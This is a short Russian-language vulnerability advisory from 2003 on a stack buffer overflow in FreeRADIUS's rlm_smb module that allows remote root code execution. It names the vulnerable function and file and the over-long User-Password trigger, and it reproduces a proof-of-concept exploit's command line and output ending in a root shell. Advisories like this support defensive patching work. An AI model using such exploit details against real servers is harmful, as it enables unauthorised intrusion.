| Дата публикации: | 28.11.2003 |
| Всего просмотров: | 1255 |
| Опасность: | Высокая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: FreeRADIUS 0.9.3 и более ранние версии
Описание: Переполнение буфера обнаружено в FreeRADIUS в rlm_smb модуле. Удаленный пользователь может выполнить произвольный код с root привилегиями. Удаленный пользователь может представить чрезмерно длинный User-Password параметр, длинее 128 байт, чтобы вызвать переполнение стекового буфера. Уязвимость расположена в функции SMB_Logon_Server() в 'src/modules/rlm_smb/smblib.c' файле. Пример/Эксплоит: $ ./bugfree -p 1812 -u cparker -s testing123 192.168.3.12 FreeRADIUS <= 0.9.3 rlm_smb remote overflow exploit (PoC) Trying to login as user "cparker" with secret "testing123" ... Prepared the packet, 513 bytes Attacking 192.168.3.12:1812 ... Sent, checking for a shell ... Success, proceed with commands Linux lina.s-quadra.com 2.4.20 #1 Wed Nov 19 22:21:27 EST 2003 i686 unknown uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) exit URL производителя: http://www.freeradius.org Решение:Производитель выпустил исправление, доступное через CVS. |
|
| Ссылки: | FreeRADIUS <= 0.9.3 rlm_smb module stack overflow vulnerability |